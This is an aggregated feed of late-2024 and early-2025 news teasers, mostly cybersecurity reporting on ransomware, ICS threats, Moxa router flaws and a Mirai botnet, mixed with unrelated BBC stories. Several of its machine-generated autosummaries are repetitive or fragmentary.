  Autosummary: Some of the prominent actors associated with FunkSec are listed below - A suspected Algeria-based actor named Scorpion (aka DesertStorm) who has promoted the group on underground forums such as Breached Forum El_farado, who emerged as a main figure advertising FunkSec after DesertStorm"s ban from Breached Forum XTN, a likely associate who is involved in an as-yet-unknown "data-sorting" service Blako, who has been tagged by DesertStorm along with El_farado Bjorka, a known Indonesian hacktivist whose alias has been used to claim leaks attributed to FunkSec on DarkForums, either pointing to a loose affiliation or their attempts to impersonate FunkSec The possibility that the group may also be dabbling in hacktivist activity is evidenced by the presence of DDoS attack tools, as well as those related to remote desktop management (JQRAXY_HVNC) and password generation (funkgenerate). "

  ---

  GitLab CISO on proactive monitoring and metrics for DevSecOps success

  industry
  2025-01-09 https://www.helpnetsecurity.com/2025/01/09/josh-lemos-gitlab-devsecops-success/
  

  In this Help Net Security interview, Josh Lemos, CISO at GitLab, talks about the shift from DevOps to DevSecOps, focusing on the complexity of building systems and integrating security tools. He shares tips for maintaining development speed, fostering collaboration, and using metrics to track DevSecOps success. What are organizations’ most significant challenges when shifting from DevOps to DevSecOps? The complexity of organizations’ build processes and developer ecosystems is a significant challenge for those seeking to … More →

  The post GitLab CISO on proactive monitoring and metrics for DevSecOps success appeared first on Help Net Security.

  "

  Autosummary: Organizations should take steps to ease the implementation of security into their systems to avoid complexity from suboptimal design decisions, such as difficult-to-maintain code and redundant dependencies, which can create a larger attack surface and generate more security scan findings for teams to sort through, prioritize, and address. While developers in DevOps may deploy code dozens or hundreds of times a day, scanners, for example, static application security tools (SAST), often run on a scheduled basis, leading to delays in feedback loops.In this Help Net Security interview, Josh Lemos, CISO at GitLab, talks about the shift from DevOps to DevSecOps, focusing on the complexity of building systems and integrating security tools. "

  ---

  Politics content to be pushed on all Instagram and Threads users

  industry
  2025-01-09 https://www.bbc.com/news/articles/clyjyd0297go
  Users will no longer be able to opt out of political content from people they do not follow. "

  Autosummary: "

  ---

  FCC Launches "Cyber Trust Mark" for IoT Devices to Certify Security Compliance

  industry
  2025-01-08 https://thehackernews.com/2025/01/fcc-launches-cyber-trust-mark-for-iot.html
  The U.S. government on Tuesday announced the launch of the U.S. Cyber Trust Mark, a new cybersecurity safety label for Internet-of-Things (IoT) consumer devices. "IoT products can be susceptible to a range of security vulnerabilities," the U.S. Federal Communications Commission (FCC) said. "Under this program, qualifying consumer smart products that meet robust cybersecurity standards will bear "

  Autosummary: "

  ---

  Moxa router flaws pose serious risks to industrial environmets

  industry
  2025-01-07 https://securityaffairs.com/172770/ics-scada/moxa-router-flaws-risks-to-industrial-environmets.html
  Moxa warns of two flaws in its routers and security appliances that enable privilege escalation and remote command execution. Moxa addressed privilege escalation and OS command injection vulnerabilities in cellular routers, secure routers, and network security appliances. Below are the descriptions for both vulnerabilities: Moxa released firmware updates to address vulnerabilities CVE-2024-9140 and CVE-2024-9138. Affected […] "

  Autosummary: "

  ---

  New Mirai botnet targets industrial routers with zero-day exploits

  exploits industry
  2025-01-07 https://www.bleepingcomputer.com/news/security/new-mirai-botnet-targets-industrial-routers-with-zero-day-exploits/
  A relatively new Mirai-based botnet has been growing in sophistication and is now leveraging zero-day exploits for security flaws in industrial routers and smart home devices. [...] "

  Autosummary: Huawei routers (via CVE-2017-17215) Neterbit routers (custom exploit) LB-Link routers (via CVE-2023-26801) Four-Faith Industrial Routers (via the zero-day now tracked as CVE-2024-12856) PZT cameras (via CVE-2024-8956 and CVE-2024-8957) "

  ---

  Vulnerable Moxa devices expose industrial networks to attacks

  industry
  2025-01-06 https://www.bleepingcomputer.com/news/security/vulnerable-moxa-devices-expose-industrial-networks-to-attacks/
  Industrial networking and communications provider Moxa is warning of a high-severity and a critical vulnerability that impact various models of its cellular routers, secure routers, and network security appliances. [...] "

  Autosummary: "

  ---

  Severe Security Flaws Patched in Microsoft Dynamics 365 and Power Apps Web API

  industry
  2025-01-02 https://thehackernews.com/2025/01/severe-security-flaws-patched-in.html
  Details have emerged about three now-patched security vulnerabilities in Dynamics 365 and Power Apps Web API that could result in data exposure. The flaws, discovered by Melbourne-based cybersecurity company Stratus Security, have been addressed as of May 2024. Two of the three shortcomings reside in Power Platform"s OData Web API Filter, while the third vulnerability is rooted in the FetchXML "

  Autosummary: "

  ---

  Iranian and Russian Entities Sanctioned for Election Interference Using AI and Cyber Tactics

  industry rusia-ucrania
  2025-01-01 https://thehackernews.com/2025/01/iranian-and-russian-entities-sanctioned.html
  The U.S. Treasury Department"s Office of Foreign Assets Control (OFAC) on Tuesday leveled sanctions against two entities in Iran and Russia for their attempts to interfere with the November 2024 presidential election. The federal agency said the entities – a subordinate organization of Iran"s Islamic Revolutionary Guard Corps and a Moscow-based affiliate of Russia"s Main Intelligence "

  Autosummary: In August 2024, the Office of the Director of National Intelligence (ODNI), the Federal Bureau of Investigation (FBI), and the Cybersecurity and Infrastructure Security Agency (CISA) jointly accused Iran of attempting to undermine democratic processes, including by orchestrating cyber operations designed to gain access to sensitive information related to the elections. "

  ---

  Barbados fishing industry still reeling from hurricane aftermath

  industry
  2024-12-30 https://www.bbc.com/news/articles/cn7rk0ym68jo
  Hurricane Beryl lashed the island in July, devastating much of its fishing fleet. "

  Autosummary: "Beryl was like a surprise attack, like an ambush," says Cornelius, in a deep baritone voice, over the market"s chatter, reggae and thwack of cleavers on chopping boards."I feel if we can communicate to the global superpowers the pain that we feel seeing this happen to our environment," adds 16-year-old Adrielle Baird, "then it would help them to understand and help us collaborate to find ways to fix the issues that we"re seeing."At the Oistins Fish Market in Bridgetown, flying fish are still available, along with marlin, mahi-mahi and tuna, though only a handful of stalls are open. "

  ---

  APT and financial attacks on industrial organizations in Q3 2024

  financial industry
  2024-12-26 https://ics-cert.kaspersky.com/publications/apt-and-financial-attackson-industrial-organizationsin-q3-2024/
  During the quarter, a number of research papers and technical advisories were published detailing attacks that either targeted or affected organizations in the industrial sector. From our perspective, the following are likely to be the most interesting for researchers and useful for cybersecurity practitioners "

  Autosummary: Chinese-speaking activity APT41 attacks According to Mandiant researchers, the threat actor APT41 (aka Barium, Wicked Panda, Wicked Spider, Earth Baku, Axiom, Blackfly, Brass Typhoon, Barium, Bronze Atlas, HOODOO, Red Kelpie, TA415 and Winnti) launched data exfiltration attacks against global shipping and logistics, media, technology and automotive sectors, primarily in Italy, Spain, Taiwan, Thailand, Turkey and the UK.Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims from sectors including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, communications, and critical infrastructure.They believe Unit 29155 is responsible for targeting the Ukrainian government, critical infrastructure organizations, and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of NATO members, the EU, as well as Central American and Asian countries.The group has been active since at least 2018 and targets organizations and individuals in Colombia, Ecuador, Chile, Panama, and other Latin American countries, focusing on various sectors, including government, finance, energy, oil and gas. SloppyLemming attacks According to Cloudflare, the threat actor SloppyLemming (aka Outrider Tiger) has been targeting organizations in the government, law enforcement, energy, education, telecoms and technology sectors in Pakistan, Bangladesh, Sri Lanka, Nepal and China.In addition, it has the functionality to steal credentials from Outlook, browsers, crypto wallets, Telegram and Steam sessions, Discord tokens, password managers, data from Windows Credential Manager and Windows Vault, as well as read the list of active processes and installed applications. Southeast Asia and Korean Peninsula Andariel attacks The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI) and other authoring partners published a Cybersecurity Advisory on July 25 focusing on the state-sponsored cybergroup known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa.CLNTEND, first detected in April 2024, is a remote access tool (RAT) that supports a wider range of network protocols for communication, including TCP, HTTP, HTTPS, TLS, and SMB (port 445).Using these tools, the group managed to carry out a number of new attacks against various Russian facilities: an instrumentation manufacturer, a polymer materials plant, a mechanical plant, a technology park, a leasing company, an oil and gas company, and an IT company.Nevertheless, some network activity from the botnet has been detected over the last four years targeting critical sectors in the USA and Taiwan, including military, government, higher education, telecoms, defense industrial base, and IT.The affiliates then moved laterally inside the network using methods such as RDP, PsExec, AnyDesk, Connectwise, N-Able, Cobalt Strike, Metasploit, and others.Data exfiltration has been observed through the use of tools such as PuTTY, Amazon AWS S3 buckets/tools, HTTP POST requests, WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods. The CMoon worm, which spread through a compromised the website of a Russian energy company, and the TIDRONE/Operation WordDrone attacks, which appear to be either supply chain attacks or exploiting a vulnerability in an ERP product to gain initial access to the victim’s systems, reiterate the point that these widely discussed attack vectors, when a third-party service is compromised by the attacker to infect other systems, should by no means be excluded from the threat models of modern industrial enterprises.Organizations in the USA, UK, Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong and Australia have been targeted.For other tasks, Head Mare primarily uses publicly available software in its attacks, such as Sliver (the main C2 framework for attackers), ngrok, rsockstun (both used for pivoting), XenAllPasswordPro, and Mimikatz.This service enables a full range of activities, including scalable bot exploitation, vulnerability and exploit management, remote management of C2 infrastructure, file uploads and downloads, remote command execution, and the ability to tailor IoT-based DDoS attacks at scale.The authoring agencies identified the threat actor as primarily targeting defense, aerospace, nuclear, and engineering organizations in the USA, Japan, South Korea, and India.The APT group is known for using spear phishing to impersonate government agencies or banking institutions to distribute various publicly available Trojans, such as AsyncRAT, BitRAT, Lime RAT, NjRAT, Quasar RAT, and Remcos RAT.Files containing saved passwords, cookies, bookmarks, browsing history, and information for autofilling forms, including credit card information, could be collected from web browsers. RansomHub attacks The US Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing and Analysis Center (MS-ISAC), and Department of Health and Human Services (HHS) issued a joint Cybersecurity Advisory (CSA) on August 29 containing information relevant to the RansomHub ransomware-as-a-service (RaaS) group (formerly known as Cyclops and Knight). Middle East-related activity Peach Sandstorm attacks Between April and July, Microsoft researchers observed the Peach Sandstorm threat actor (aka APT33, Elfin and Refined Kitten) deploy a new custom multi‑stage backdoor dubbed Tickler in attacks against the satellite, communications equipment and oil and gas sectors, as well as federal and state government sectors in the USA and UAE. "

  ---

  Threat landscape for industrial automation systems. Regions, Q3 2024

  industry
  2024-12-25 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-regions-q3-2024/
  The percentage of ICS computers on which malicious objects were blocked decreased from the second quarter to 22%. But the figure increased in Africa, South Asia, South-East Asia, the Middle East, Latin America, and East Asia. Regionally, the percentage ranged from 9.7% in Northern Europe to 31.5% in Africa. "

  Autosummary: Comparative analysis Latin America occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place – malicious documents Second place – malicious scripts and phishing pages, threats from email clients Threat categories Compared to global figures, the region has a higher percentage of ICS computers on which the following threat categories were blocked: Malicious documents, 2.1 times higher Malicious scripts and phishing pages, 1.4 times higher Spyware, 1.2 times higher Web miners, 1.1 times higher Threat sources The region ranked second in the world by percentage of ICS computers on which malicious threats from email clients were blocked, exceeding the global average by 1.8 times. Comparative analysis Southern Europe occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place – threats from email clients Second place – malicious documents Third place – malicious scripts and phishing pages among regions by percentage of ICS computers on which the following were blocked: Threat categories Compared to the global average , the region has a higher percentage of ICS computers on which the following were blocked: Malicious documents, 1.7 times higher Spyware, 1.4 times higher Malicious scripts and phishing pages, 1.3 times higher Ransomware, 1.3 times higher , the region has a higher percentage of ICS computers on which the following were blocked: Threat sources Southern Europe ranked first in the world by percentage of ICS computers where malicious threats from email clients were blocked, surpassing the global average by 2 times. Comparative analysis In Q3 2024, Central Asia occupied leading positions among regions by percentage of ICS computers on which the following were blocked: First place: miner executable files for Windows Second place: worms Threat categories Compared to the global average , the region has a higher percentage of ICS computers on which the following were blocked: Miners in the form of executable files for Windows, 2.3 times higher Worms, 2.2 times higher Ransomware, 1.1 times higher Spyware, 1.1 times higher , the region has a higher percentage of ICS computers on which the following were blocked: Threat sources The percentage of ICS computers on which threats from removable devices were blocked exceeded the global average by 1.4 times in Q3 2024. Threat categories Compared to the global average , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Web miners, 1.4 times higher Spyware, 1.3 times higher Miners in the form of executable files for Windows, 1.1 times higher Malicious documents, 1.1 times higher Worms, 1.1 times higher , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Threat sources In Q3 2024, East Asia ranked first again among the regions by percentage of ICS computers where malicious threats from network folders were blocked, surpassing the global average by 2.7 times. Industries The most affected industries in the region, as selected for this report, are: Construction Building automation industries in the region, as selected for this report, are: Compared to the global averages , the following industries had a significantly higher percentage of ICS computers with blocked malicious objects compared to the respective global averages : Manufacturing – 1.5 times higher Construction – 1.4 times Electric power – 1.3 times Building automation – 1.2 times higher Engineering and ICS integration – 1.2 times , the following industries had a significantly of ICS computers with blocked malicious objects compared to the respective global averages In Q3 2024, all selected sectors experienced an increase in the percentage of ICS computers where malicious objects were blocked. Threat categories Compared to the global figures, the region has a higher percentage of ICS computers on which the following were blocked: Web miners, 1.4 times higher Spyware, 1.3 times higher Miners in the form of executable files for Windows, 1.1 times higher Malicious documents, 1.1 times higher Worms, 1.1 times higher Threat sources Threats from email clients exceeded the global average by 1.5 times.Compared to the global figures , the region has a significantly higher percentage of ICS computers on which the following were blocked: AutoCAD malware, 6.9 times higher Viruses, 5.4 times higher Spyware, 1.4 times higher Malicious scripts and phishing pages, 1.3 times higher Worms, 1.3 times higher Malicious documents, 1.2 times higher , the region has a significantly of ICS computers on which the following were blocked: Threat sources The region ranked second in the world by percentage of ICS computers on which threats from network folders were blocked, exceeding the global average by 2.6 times. Specifically, the following threat categories showed significantly higher values: Ransomware, 1.8 times higher Worms, 1.7 times higher Spyware, 1.6 times higher Web miners, 1.6 times higher Viruses, 1.3 times higher Malicious scripts and phishing pages, 1.3 times higher Malicious documents, 1.3 times higher values: Threat sources The region ranked third in the world by percentage of ICS computers on which threats from internet and email clients were blocked, exceeding the global average by a factor of 1.1 and 1.7 respectively. industry in the region, as selected for this report, is Compared to the global averages, the following industries had a significantly higher percentage of ICS computers with blocked malicious objects compared to the respective global averages : Construction – 1.7 times higher Manufacturing – 1.6 times higher Engineering & ICS Integration – 1.5 times higher Oil & Gas – 1.4 times higher Electric Power – 1.4 times higher the following industries had a significantly higher percentage of ICS computers with blocked malicious objects compared to the respective global averages In Q3 2024, all selected sectors in the region, except oil & gas, exhibited an increase in the percentage of ICS computers on which malicious objects were blocked. Comparative analysis Africa occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place: denylisted internet resources, malicious scripts and phishing pages, spyware, worms, threats from internet and removable devices Second place: web miners, ransomware, viruses Threat categories Compared to global figures, the region has a higher percentage of ICS computers on which threats were blocked across all threat categories. Ransomware, 1.8 times higher Spyware, 1.7 times higher Denylisted internet resources, 1.6 times higher Web miners, 1.4 times higher Malicious scripts and phishing pages, 1.4 times higher Malware for AutoCAD, 1.4 times higher percentage percentages of ICS computers on which the following were blocked Threat sources The region ranked first in the world both by percentage of ICS computers on which threats from internet and removable devices were blocked, exceeding the global average by 1.4 times and 4.6 times respectively. Compared to the respective global averages , the following sectors in the region saw a higher percentage of ICS computers on which malicious objects were blocked: Electric power, 1.3 times higher Construction, 1.2 times higher , the following sectors in the region saw a of ICS computers on which malicious objects were blocked: In Q3 2024, all sectors, except for manufacturing, exhibited an increase in the percentage of ICS computers on which malicious objects were blocked. Comparative analysis South Asia occupies leading positions among regions by percentage of ICS computers on which the following were blocked: Second place – threats from removable devices Third place – miners in the form of executable files for Windows, ransomware, threats from network folders Threat categories Compared to the global average, the region has a noticeably higher percentage of ICS computers on which the following were blocked: Worms, 1.4 times higher. Comparative analysis Threat categories Compared to the global average , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages – 1.2 times higher Malicious documents – 1.1 times higher , the region has a noticeably of ICS computers on which the following were blocked: Threat sources The percentage of ICS computers on which threats from email clients were blocked surpassed the global average by a factor of 1.1. From a global perspective , the following industries saw a higher percentage of ICS computers on which malicious objects were blocked : Construction – 1.3 times higher Electric power – 1.2 times higher Oil and gas – 1.2 times higher Building automation – 1.1 times higher Engineering & ICS Integration – 1.1 times higher , the following industries saw a of ICS computers on which malicious objects were blocked In Q3 2024, the electric power sector exhibited the most noticeable increase (by a factor of 1.1) in the percentage of ICS computers on which malicious objects were blocked, compared to the previous quarter. Comparative analysis South-East Asia occupies leading positions among regions by percentage of ICS computers on which the following were blocked: First place: viruses, malware for AutoCAD Second place: denylisted internet resources, threats from the internet, threats from network folders Third place: malicious spyware Threat categories Viruses came second in the ranking of malware categories by percentage of ICS computers on which they were blocked. Quarterly changes and trends Threat categories Compared to the previous quarter, the largest proportional increase was in the percentage of ICS computers on which the following were blocked: Malicious documents – 1.4 times higher Malicious scripts and phishing pages – 1.1 times higher was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked : Denylisted internet resources – by 1.5 times Malicious scripts and phishing pages – by 1.4 times Malicious documents – by 1.2 times Ransomware – by 1.1 times in Q3 2024 was in the percentage of ICS computers on which the following were blocked The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the ranking of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Denylisted internet resources – by 1.5 times Malicious scripts and phishing pages – by 1.1 times Malicious documents – by 1.1 times in Q3 2024 was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages, by 1.1 times Denylisted internet resources, by 1.1 times The top threat categories exhibit various quarterly dynamics: The heat map below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Malware for AutoCAD – by 1.8 times Malicious documents – by 1.3 times Malicious scripts and phishing pages – by 1.3 times Denylisted internet resources – by 1.2 times Viruses – by 1.1 times. Quarterly changes and trends Threat categories he largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Malicious documents – 1.4 times higher Malicious scripts and phishing pages – 1.1 times higher in was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the rankings of threat categories in the region since the beginning of 2022. Quarterly changes and trends Threat categories The largest proportional increase in Q3 2024 was in the percentage of ICS computers on which the following were blocked: Denylisted internet resources – by 1.3 times Malicious scripts and phishing pages – by 1.2 times in Q3 2024 was in the percentage of ICS computers on which the following were blocked: The top threat categories exhibit various quarterly dynamics: The heatmap below illustrates changes in the ranking of threat categories in the region since the beginning of 2022.This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Computers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries. Regions ranked by percentage of ICS computers on which spyware was blocked, Q3 2024 In almost all regions, spyware does not rank higher than third in the threat category rankings by percentage of ICS computers on which it was blocked, except in the following regions: East Asia : in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked. Regions ranked by percentage of ICS computers on which malicious objects were blocked, Q3 2024 All regions ranked by percentage of ICS computers on which malicious objects were blocked in the third quarter can be divided into three groups: Over 25% Africa – 31.5% South-East Asia – 30% Middle East – 25.6% In the regions within this group, OT computers are generally overexposed to cyberthreats. "

  ---

  Threat landscape for industrial automation systems. Q3 2024

  industry
  2024-12-25 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q3-2024/
  The percentage of ICS computers on which malicious objects were blocked decreased by 1.5 pp from the second quarter to 22%. The biometrics sector led the surveyed industries in terms of this parameter. "

  Autosummary: This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Computers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries. The phishing lures were distributed through various channels, including phishing emails (e.g., fake vulnerability notifications claiming to be from GitHub), malicious links, and malvertising networks found on adult sites, file sharing services, betting platforms, anime resources, and web apps that monetize through traffic.Q3 in numbers Parameter Q2 2024 Q3 2024 Quarterly changes Global percentage of attacked ICS computers 23.5% 22.0% -1.5 pp Percentage of ICS computers on which malicious objects from different categories were blocked Denylisted internet resources 6.63% 6.84% 0.21 pp Malicious scripts and phishing pages (JS and HTML) 5.69% 6.24% 0.55 pp Spy Trojans, backdoors and keyloggers 4.08% 3.91% -0.17 pp Malicious documents (MSOffice + PDF) 1.96% 1.97% 0.01 ppThe most common are the chemical industry, metallurgy, ICS design and integration, oil and gas, energy, transport and logistics, food industry, light industry, pharmaceuticals. Percentage of ICS computers on which malicious objects were blocked, by month, 2022–2024 Regionally*, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 9.7% in Northern Europe to 31.5% in Africa. Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022-2024 Compared to the third quarter of 2023, the percentage decreased by 1.7 pp. Percentage of ICS computers on which malicious objects were blocked in selected industries Diversity of detected malicious objects Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose. "

  ---

  2025 is going to be a bumpy year for IoT

  industry
  2024-12-24 https://www.helpnetsecurity.com/2024/12/24/iot-2025-security/
  

  In the Internet of Things (IoT) sector, 2025 is shaping up to be a politically charged year. Major global jurisdictions are set to implement device security regulations, coinciding with potential tariffs, shifting production dynamics, and rising geopolitical tensions. My advice for companies involved in manufacturing or using IoT devices? Prepare for the worst, but hope for the best. Geopolitical tensions are impacting IoT There’s no denying that the macro landscape is splintered. Internet infrastructure is … More →

  The post 2025 is going to be a bumpy year for IoT appeared first on Help Net Security.

  "

  Autosummary: Major global jurisdictions are set to implement device security regulations, coinciding with potential tariffs, shifting production dynamics, and rising geopolitical tensions. Governments are kicking into action At the same time, and likely in response to the above, governments are introducing big legislative changes to encourage better device practices. "

  ---

  Brazil shuts BYD factory site over "slavery" conditions

  latam industry
  2024-12-24 https://www.bbc.com/news/articles/c8xj9jp57r2o
  More than 160 workers have been rescued, according to local prosecutors. "

  Autosummary: It added that it had conducted a "detailed review" of the working and living conditions for subcontracted employees, and asked on "several occasions" for the construction firm to make improvements. "

  ---

  Three shot dead as medics, journalists and police attacked at Haiti hospital

  industry
  2024-12-24 https://www.bbc.com/news/articles/cx2vpdnd2jmo
  Many others are injured when armed men fire at medical staff, police and reporters in Port-au-Prince. "

  Autosummary: "

  ---

  FTC orders Marriott and Starwood to implement strict data security

  industry
  2024-12-23 https://www.bleepingcomputer.com/news/security/ftc-orders-marriott-and-starwood-to-implement-strict-data-security/
  The Federal Trade Commission (FTC) has ordered Marriott International and Starwood Hotels to define and implement a robust customer data security scheme following failures that led to massive data breaches. [...] "

  Autosummary: "

  ---

  Why cybersecurity is critical to energy modernization

  industry ciber
  2024-12-20 https://www.helpnetsecurity.com/2024/12/20/anjos-nijk-encs-energy-grid-cybersecurity/
  

  In this Help Net Security interview, Anjos Nijk, Managing Director of the European Network for Cyber security (ENCS), discusses cybersecurity in the energy sector as it modernizes with renewable sources and smart grid technologies. Nijk also addresses the need for international collaboration, the impact of IoT on security, and the emerging technologies that can enhance the resilience and reliability of critical energy infrastructure. As the energy sector undergoes significant modernization, particularly with the integration of … More →

  The post Why cybersecurity is critical to energy modernization appeared first on Help Net Security.

  "

  Autosummary: So, we need to implement technology to maintain control, but also need to create the conditions for residential users, operators and integrators to securely install, operate and maintain their infrastructure. However, connected infrastructures, such as renewables and EV charging networks, fall outside the direct control of grid operators, and can also cause blackouts in the grid.In this Help Net Security interview, Anjos Nijk, Managing Director of the European Network for Cyber security (ENCS), discusses cybersecurity in the energy sector as it modernizes with renewable sources and smart grid technologies. "

  ---

  Ransomware in 2024: New players, bigger payouts, and smarter tactics

  exploits industry
  2024-12-19 https://www.helpnetsecurity.com/2024/12/19/ransomware-surveys-2024/
  

  In 2024, ransomware remained the top cybersecurity threat to organizations worldwide. New groups filled the void left by law enforcement crackdowns, targeting businesses with record-breaking ransom demands and sophisticated tactics. In this article, you will find excerpts from ransomware surveys we covered in 2024 that will help your organization improve cybersecurity strategies. VPN vulnerabilities, weak credentials fuel ransomware attacks Following law enforcement’s takedown of LockBit in Q1, RansomHub, which emerged in February 2024, quickly filled the void, … More →

  The post Ransomware in 2024: New players, bigger payouts, and smarter tactics appeared first on Help Net Security.

  "

  Autosummary: During the second quarter, new ransomware groups, including PLAY, Medusa, RansomHub, INC Ransom, BlackSuit, and some additional lesser-known factions, led a series of attacks that eclipsed the first quarter of this year by 16% and the second quarter of 2023 by 8%. The findings from the report uncovered a record-breaking ransom payment of $75 million to the Dark Angels ransomware group, which is nearly double the highest publicly known ransomware payout, and an overall 18% increase in ransomware attacks year-over-year.As for whether organizations are paying the ransom, respondents were split: 34% pay every time, 21% pay only some of the time, and 45% never pay. "

  ---

  Critics "continue to try to cancel me" - Vinicius Jr

  industry
  2024-12-18 https://www.bbc.com/sport/football/articles/cwy4e7d7wllo
  Real Madrid forward Vinicius Jr says his critics "continue to try to cancel me, to belittle me" after earning one of football"s biggest individual honours. "

  Autosummary: "

  ---

  Iran-Linked IOCONTROL Malware Targets SCADA and Linux-Based IoT Platforms

  exploits industry Linux
  2024-12-13 https://thehackernews.com/2024/12/iran-linked-iocontrol-malware-targets.html
  Iran-affiliated threat actors have been linked to a new custom malware that"s geared toward IoT and operational technology (OT) environments in Israel and the United States. The malware has been codenamed IOCONTROL by OT cybersecurity company Claroty, highlighting its ability to attack IoT and supervisory control and data acquisition (SCADA) devices such as IP cameras, routers, programmable "

  Autosummary: The development makes IOCONTROL the tenth malware family to specifically single out Industrial Control Systems (ICS) after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, PIPEDREAM (aka INCONTROLLER), COSMICENERGY, and FrostyGoop (aka BUSTLEBERM) to date. "

  ---

  Cato Networks extends SASE-based protection to IoT/OT environments

  industry
  2024-12-11 https://www.helpnetsecurity.com/2024/12/11/cato-iot-ot-security/
  

  With the introduction of Cato IoT/OT Security, Cato Networks is enabling enterprises to simplify the management and security of Internet of Things (IoT) and operational technology (OT) devices. Cato IoT/OT Security converges device discovery and classification, policy enforcement, and threat prevention in a SASE platform. Cato IoT/OT Security is a native feature in the Cato SASE Cloud Platform, which allows enterprises to instantly activate the new solution with a click of a button. There is … More →

  The post Cato Networks extends SASE-based protection to IoT/OT environments appeared first on Help Net Security.

  "

  Autosummary: Additionally, IoT devices are often less secure by design, while OT systems in critical infrastructure are generally challenging to patch,” said John Grady, principal analyst, network security and web application security at ESG. Enterprises require an IoT/OT security solution that provides discovery, visibility, policy enforcement, and threat prevention for IoT/OT devices. "

  ---

  Researchers Uncover Espionage Tactics of China-Based APT Groups in Southeast Asia

  industry
  2024-12-11 https://thehackernews.com/2024/12/researchers-uncover-espionage-tactics.html
  A suspected China-based threat actor has been linked to a series of cyber attacks targeting high-profile organizations in Southeast Asia since at least October 2023. The espionage campaign targeted organizations in various sectors spanning government ministries in two different countries, an air traffic control organization, a telecoms company, and a media outlet, the Symantec Threat Hunter Team "

  Autosummary: The attacks, which leveraged tools previously identified as linked to China-based advanced persistent threat (APT) groups, are characterized by the use of both open-source and living-off-the-land (LotL) techniques. "

  ---

  Lynx ransomware behind Electrica energy supplier cyberattack

  exploits ransomware industry ciber
  2024-12-11 https://www.bleepingcomputer.com/news/security/lynx-ransomware-behind-electrica-energy-supplier-cyberattack/
  ​The Romanian National Cybersecurity Directorate (DNSC) says the Lynx ransomware gang breached Electrica Group, one of the largest electricity suppliers in the country. [...] "

  Autosummary: INC vs Lynx ransomware string comparison (BleepingComputer) Since it emerged as a ransomware-as-a-service (RaaS) operation in July 2023, INC Ransom has also breached many education, healthcare, government, and industrial entities, including Yamaha Motor Philippines, Scotland"s National Health Service (NHS), and the U.S. division of Xerox Business Solutions (XBS). "

  ---

  Romanian energy supplier Electrica Group is facing a ransomware attack

  exploits ransomware industry
  2024-12-10 https://securityaffairs.com/171832/hacking/electrica-group-ransomware-attack.html
  Romanian energy supplier Electrica Group is investigating an ongoing ransomware attack impacting its operations. Romanian energy supplier Electrica Group suffered a cyber attack that is impacting its operations. The company assured investors that the attack hadn’t affected its critical systems, but temporary disruptions in customer services might occur due to enhanced security protocols. These measures […] "

  Autosummary: The teams of specialists are working closely with the national cybersecurity authorities to manage and resolve the incident, aiming to address the situation as quickly as possible, identify the source of the attack, and limit its impact.” reads the note. Pierluigi Paganini December 10, 2024 December 10, 2024 Romanian energy supplier Electrica Group is investigating an ongoing ransomware attack impacting its operations. "

  ---

  Hit by blackouts Cuba’s tourism industry now braces for Trump

  industry
  2024-12-09 https://www.bbc.com/news/articles/cly7ndxjzv2o
  Cuba"s hotels, already hit by power cuts, worry that Trump may increase the US"s economic blockade. "

  Autosummary: Hit by blackouts Cuba’s tourism industry now braces for Trump Getty Images Canadian tourists, such as these taking part in an exercise class, are vital to the Cuban tourism sector With winter nights drawing in across North America, Canadian “snowbirds” – citizens who flee their freezing temperatures for sunnier climes every year – are planning their annual trips to Florida or the Caribbean.“The Ministry of Tourism has been preparing for the winter season to deliver better services, uninterrupted supplies, a better airport experience, and more and new car rentals.” "

  ---

